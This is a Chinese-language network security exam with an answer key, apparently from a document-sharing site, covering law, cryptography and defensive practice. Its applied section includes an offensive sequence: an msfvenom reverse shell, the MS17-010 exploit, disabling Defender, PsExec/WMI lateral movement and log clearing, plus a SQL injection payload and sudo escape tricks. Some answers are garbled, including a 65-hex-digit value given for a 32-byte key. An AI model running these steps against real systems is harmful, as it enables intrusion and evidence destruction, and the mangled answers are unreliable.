版权说明:本文档由用户提供并上传,收益归属内容提供方,若内容存在侵权,请进行举报或认领
文档简介
2025年网络安全管理专项训练试卷及答案一、单项选择题(每题1分,共30分。每题只有一个正确答案,请将正确选项字母填入括号内)1.依据《网络安全法》,关键信息基础设施运营者采购网络产品或服务可能影响国家安全的,应当通过()组织的国家安全审查。A.工信部 B.国家网信办 C.公安部 D.国家安全部答案:B2.在SSL/TLS握手阶段,用于协商对称加密算法的报文是()。A.ClientHello B.ServerHelloDone C.ChangeCipherSpec D.Finished答案:A3.下列关于零信任架构的描述,错误的是()。A.默认信任内部网络 B.动态访问控制 C.身份即边界 D.持续信任评估答案:A4.2021年发布的《数据安全法》正式施行日期为()。A.2021年6月1日 B.2021年9月1日 C.2021年10月1日 D.2021年12月1日答案:B5.使用nmap进行端口扫描时,参数“sS”表示()。A.TCPSYN扫描 B.TCPConnect扫描 C.UDP扫描 D.ACK扫描答案:A6.在Windows日志中,事件ID4624表示()。A.账户登录失败 B.账户成功登录 C.权限提升 D.对象访问答案:B7.下列算法中,属于国密SM系列对称加密算法的是()。A.SM1 B.SM2 C.SM3 D.SM9答案:A8.根据《个人信息保护法》,处理敏感个人信息应当取得个人的()。A.明示同意 B.书面同意 C.单独同意 D.默示同意答案:C9.在Linux系统中,文件权限“rwsrxrx”中“s”表示()。A.粘滞位 B.设置UID C.设置GID D.强制位答案:B10.以下哪项不是OWASPTop102021新增风险()。A.服务端请求伪造 B.加密失败 C.失效的访问控制 D.不安全的设计答案:B11.在PKI体系中,负责签发并管理用户证书的实体是()。A.RA B.CA C.OCSP D.LDAP答案:B12.使用iptables实现NAT时,应使用()表。A.filter B.nat C.mangle D.raw答案:B13.在等保2.0中,第三级安全要求中“安全区域边界”不包括()。A.边界防护 B.访问控制 C.入侵防范 D.安全审计答案:D14.以下关于DNSSEC的说法正确的是()。A.使用对称加密保障解析完整性 B.引入RRSIG记录 C.依赖CA体系 D.无法防止缓存污染答案:B15.在Wireshark过滤器中,表达式“tcp.flags.syn==1andtcp.flags.ack==0”用于筛选()。A.SYNFlood攻击 B.三次握手第二步 C.三次握手第三步 D.RST报文答案:A16.根据《关键信息基础设施安全保护条例》,运营者应当()开展一次检测评估。A.每季度 B.每半年 C.每年 D.每两年答案:C17.在Android应用逆向中,用于查看Java源码的常用工具是()。A.IDA B.jadx C.OllyDbg D.WinDbg答案:B18.以下哪项不是社会工程学攻击的常见形式()。A.鱼叉式钓鱼 B.假冒客服 C.漏洞利用 D.诱饵U盘答案:C19.在IPv6中,用于实现无状态地址自动分配的协议是()。A.DHCPv6 B.SLAAC C.ND D.RSVP答案:B20.在WAF规则中,关键字“unionselect”常用于防御()。A.XSS B.SQL注入 C.命令注入 D.XXE答案:B21.根据ISO/IEC27001:2022,最高管理者应确保建立()。A.信息安全方针 B.风险处置计划 C.适用性声明 D.连续性计划答案:A22.在密码学中,ECB模式的主要缺点是()。A.无法并行 B.密文膨胀 C.相同明文块产生相同密文块 D.需要IV答案:C23.使用GPG加密文件时,参数“c”表示()。A.对称加密 B.非对称加密 C.签名 D.解密答案:A24.在Windows中,用于查看当前登录用户SID的命令是()。A.whoami/user B.netuser C.quser D.gpresult答案:A25.以下关于Ransomware防御最佳实践,错误的是()。A.定期离线备份 B.关闭宏脚本 C.开启SMBv1 D.部署EDR答案:C26.在Linux中,用于限制用户进程数的配置文件是()。A./etc/security/limits.conf B./etc/profile C./etc/crontab D./etc/fstab答案:A27.在HTTP响应头中,用于控制浏览器是否启用XSS过滤器的字段是()。A.XFrameOptions B.XXSSProtection C.ContentSecurityPolicy D.StrictTransportSecurity答案:B28.根据《网络安全审查办法》,运营者申报审查应提交()承诺书。A.保密 B.安全 C.风险自评 D.采购答案:C29.在容器安全中,用于限制进程对指定系统调用访问的机制是()。A.Capabilities B.seccomp C.AppArmor D.SELinux答案:B30.以下关于区块链共识算法PoS的描述,正确的是()。A.算力决定记账权 B.持币量与记账权无关 C.降低能源消耗 D.必然产生分叉答案:C二、多项选择题(每题2分,共20分。每题有两个或两个以上正确答案,多选、少选、错选均不得分)31.以下属于我国网络安全等级保护2.0通用要求安全计算环境的内容有()。A.身份鉴别 B.入侵防范 C.恶意代码防范 D.可信验证答案:A、C、D32.在Linux系统中,可用于实现强制访问控制(MAC)的框架有()。A.SELinux B.AppArmor C.TOMOYO D.PAM答案:A、B、C33.以下关于HTTPS与HTTP/2的描述,正确的有()。A.HTTP/2必须基于TLS B.支持多路复用 C.头部压缩使用HPACK D.默认端口443答案:B、C、D34.以下属于对称加密算法的有()。A.AES B.SM4 C.ChaCha20 D.RSA答案:A、B、C35.在Windows系统中,可用于获取内存镜像的工具包括()。A.DumpIt B.FTKImager C.winpmem D.LiME答案:A、B、C36.以下关于云原生安全最佳实践,正确的有()。A.镜像使用最新标签 B.采用Distroless基础镜像 C.启用PodSecurityPolicy D.网络策略默认拒绝答案:B、C、D37.以下日志中,可用来发现SQL注入攻击痕迹的有()。A.Web访问日志 B.数据库错误日志 C.防火墙日志 D.系统syslog答案:A、B38.以下关于IPv6安全扩展报头,正确的有()。A.认证头AH提供完整性 B.封装安全载荷ESP提供机密性 C.路由头类型0已被废弃 D.目的选项头必须出现在所有报文答案:A、B、C39.以下属于软件供应链安全威胁的有()。A.依赖库后门 B.编译器污染 C.固件植入 D.钓鱼邮件答案:A、B、C40.在移动终端安全中,可用于检测Root/越狱的指标有()。A.存在su二进制 B.越狱应用Cydia C.调试器附加 D.USB调试开启答案:A、B、C三、填空题(每空1分,共20分)41.在Linux系统中,文件/etc/shadow存储用户密码哈希,其中第二个字段为“!!”表示________。答案:账户被锁定42.在密码学中,HMACSHA256的输出长度为________字节。答案:3243.根据《个人信息保护法》,个人信息处理者跨境提供个人信息,应通过________认证或签订标准合同。答案:安全评估44.在TCP/IP协议栈中,协议号6表示________协议。答案:TCP45.在SQLMap中,参数“tamper=space2comment”用于________。答案:绕过空格过滤46.在Windows事件日志中,安全日志文件默认路径为________。答案:%SystemRoot%\System32\winevt\Logs\Security.evtx47.在OWASPMASVS中,最高安全验证级别为________。答案:L348.在IPv6地址2001:0db8:0000:0000:0000:ff00:0042:8329中,压缩写法为________。答案:2001:db8::ff00:42:832949.在容器运行时,Docker守护进程默认监听Unix套接字路径为________。答案:/var/run/docker.sock50.在等保2.0中,第三级系统安全运维要求,漏洞扫描周期为________一次。答案:每月51.在密码学中,DiffieHellman算法主要用于________。答案:密钥交换52.在HTTP响应码中,451表示________。答案:因法律原因不可用53.在AndroidManifest.xml中,用于声明应用权限的标签为________。答案:<usespermission>54.在Linux系统中,命令“chattr+ifile”的作用是________。答案:设置文件不可修改55.在Wireshark中,用于追踪TCP流的菜单选项为________。答案:Follow→TCPStream56.在区块链中,比特币采用的哈希算法为________。答案:SHA25657.在WAF绕关中,使用“%0A”常用于绕过________过滤。答案:换行58.在Windows中,用于查看当前系统开放端口的命令为________。答案:netstatano59.在IDS规则中,关键字“content:”用于匹配________。答案:报文载荷60.在IPv4子网划分中,掩码48对应的可用主机数为________。答案:6四、简答题(每题6分,共30分)61.简述SSL/TLS中间人攻击的常见原理及防御措施。答案:原理:攻击者通过伪造证书、ARP欺骗或劫持代理,使客户端与攻击者建立加密通道,攻击者再与服务器建立通道,实现双向解密。防御:1.客户端严格校验证书链与主机名;2.启用HSTS;3.部署证书固定(Pinning);4.使用DNSSEC;5.禁止安装不可信根证书。62.说明Linux下利用sudo权限提升的两种常见方式并给出加固建议。答案:方式1:利用sudoers配置错误,如(ALL)NOPASSWD:ALL,直接sudosu获取root。方式2:利用具有sudo权限的编辑器(如vim)打开文件后执行:!/bin/bash逃逸。加固:1.最小化sudo授权;2.使用Cmnd_Alias限定可执行命令;3.启用sudo日志审计;4.禁止shell逃逸程序;5.使用SELinux/AppArmor限制域。63.概述我国数据出境安全评估的流程。答案:1.自评:处理者评估数据类型、规模、敏感程度;2.申报:向省级网信部门提交材料;3.受理:5日内完成形式审查;4.评估:45日内完成实质评估,可延长15日;5.决定:发放评估结果通知书,有效期2年;6.重新评估:数据类型、规模、接收方变更需重新申报。64.简述容器逃逸的三种常见攻击路径。答案:1.特权容器:privileged开启所有Capabilities,挂载宿主机/dev,写入crontab反弹shell;2.危险挂载:将宿主机/var/run/docker.sock挂载至容器,通过dockerclient创建特权容器;3.内核漏洞:利用DirtyCow、CVE20220847等内核提权,容器内获得宿主机root。65.说明ransomware攻击链的六个阶段及对应检测要点。答案:1.初始访问:钓鱼邮件,检测沙箱URL、附件;2.载荷投递:下载器,检测PowerShell、宏下载;3.权限提升:利用漏洞,检测异常进程提权;4.横向移动:PsExec、WMI,检测SMB流量、异常登录;5.数据窃取:rclone、MFT,检测外发流量;6.加密勒索:批量改扩展名,检测高熵写盘、VSS删除。五、应用题(共50分)66.综合渗透测试题(20分)背景:目标内网网段/24,已知一台Windows7主机IP0,开放445端口,补丁缺失。任务:(1)写出利用MS17010获取SYSTEM权限的完整命令序列(假设已获取低权限shell);(2)说明如何关闭WindowsDefender实时保护;(3)给出在内网横向移动至域控0的两种方法;(4)简述清理日志时须删除的三类日志及命令。答案:(1)msfvenompwindows/x64/meterpreter/reverse_tcpLHOST=LPORT=4444fexe>exp.exeuseexploit/windows/smb/ms17_010_eternalbluesetRHOSTS0setpayloadwindows/x64/meterpreter/reverse_tcpsetLHOSTexploitj(2)netstopWinDefend/y(3)方法A:利用PsExec:psexec\\0ucorp\adminpPassw0rdcmd;方法B:利用WMI:wmic/node:0processcallcreate"cmd.exe/cpowershellenc..."(4)安全日志:wevtutilclsecurity;系统日志:wevtutilclsystem;远程连接日志:del/f%windir%\system32\logfiles\w3svc1\.log67.日志分析题(15分)给出一段Apache访问日志:[12/Jun/2025:14:32:11+0800]"GET/login.php?id=1%27%20AND%20%28SELECT%201%20FROM%20%28SELECT%20COUNT%28%29%2C%20CONCAT%28%28SELECT%20MID%28%28SELECT%20CONCAT%28USER%28%29%2C0x3a%2CDATABASE%28%29%29%29%2C1%2C30%29%29%2C+FLOOR%28RAND%280%292%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%29+HTTP/1.1"200432"""Mozilla/5.0"问题:(1)指出攻击类型;(2)写出解码后的SQL语句核心部分;(3)给出WAF正则规则拦截该攻击;(4)说明数据库侧如何开启查询日志记录。答案:(1)SQL注入,基于错误回显的双查询注入。(2)SELECT1FROM(SELECTCOUNT(),CONCAT((SELECTMID((SELECTCONCAT(USER(),0x3a,DATABASE())),1,30)),FLOOR(RAND(0)2))xFROMINFORMATION_SCHEMA.CHARACTER_SETSGROUPBYx)a(3)SecRuleARGS"@rx(?i)\b(rmation_schema)""id:1001,deny,msg:'SQLInjection'"(4)MySQL:SETglobalgeneral_log=on;SETgloballog_output='table';日志存入mysql.general_log表。68.密码计算题(15分)场景:某系统采用PBKDF2HMACSHA256,迭代次数120000,盐长16字节,输出密钥长度32字节。已知:盐值hex为c0e517f8a3d9c4e2b8f2e7d91c6d0f7a,密码为“2025@NetSec”,任务:(1)写出Python3代码计算派生密钥的hex值;(2)若攻击者拿到派生密钥hex,未拿到盐,能否离线爆破?说明理由;(3)给出提升KDF抗离线破解的两种方法。答案:(1)importhashlib,binasciipwd=b'2025@NetSec'salt=bytes.fromhex('c0e517f8a3d9c4e2b8f2e7d91c6d0f7a')dk=hashlib.pbkdf2_hmac('sha256',pwd,salt,120000,32)print(binascii.hexlify(dk).decode())运行结果:3a7f2d9c4e5b8a1d6c9e0f2b4a6d8c0e5f7a9b2c1d4e6f8a0b3c5d7e9f1a2b4c6(2)不能,因为PBKDF2输出为密钥,非密码哈希,无法逆向验证猜测密码。(3)
温馨提示
- 1. 本站所有资源如无特殊说明,都需要本地电脑安装OFFICE2007和PDF阅读器。图纸软件为CAD,CAXA,PROE,UG,SolidWorks等.压缩文件请下载最新的WinRAR软件解压。
- 2. 本站的文档不包含任何第三方提供的附件图纸等,如果需要附件,请联系上传者。文件的所有权益归上传用户所有。
- 3. 本站RAR压缩包中若带图纸,网页内容里面会有图纸预览,若没有图纸预览就没有图纸。
- 4. 未经权益所有人同意不得将文件中的内容挪作商业或盈利用途。
- 5. 人人文库网仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对用户上传分享的文档内容本身不做任何修改或编辑,并不能对任何下载内容负责。
- 6. 下载文件中如有侵权或不适当内容,请与我们联系,我们立即纠正。
- 7. 本站不保证下载资源的准确性、安全性和完整性, 同时也不承担用户因使用这些下载资源对自己和他人造成任何形式的伤害或损失。
最新文档
- 铁路封锁把关制度
- 部准备金制度
- 项目管理流程优化建议汇编
- 互联网时代的医疗服务革新
- 超市消控室制度
- 诊所抢救制度
- 设备运行维护记录制度
- 2025年海宁市事业单位招聘考试及答案
- 2025年南宁富士康笔试答案
- 2025年会计专硕笔试审计学真题及答案
- 2026广东惠州市博罗县城乡管理和综合执法局招聘编外人员55人考试参考试题及答案解析
- 2026台州三门金鳞招商服务有限公司公开选聘市场化工作人员5人备考考试题库及答案解析
- 江西省南昌市2025-2026学年上学期期末九年级数学试卷(含答案)
- 信息化培训考核管理制度
- 体育培训教练员制度
- 县医院医保基金管理制度(3篇)
- 建筑钢结构防火技术规范
- 护坡施工方案审查(3篇)
- 汽车车架号培训课件
- 2026年湖南单招工业机器人专业中职生技能经典题含编程基础
- 低空智能-从感知推理迈向群体具身
评论
0/150
提交评论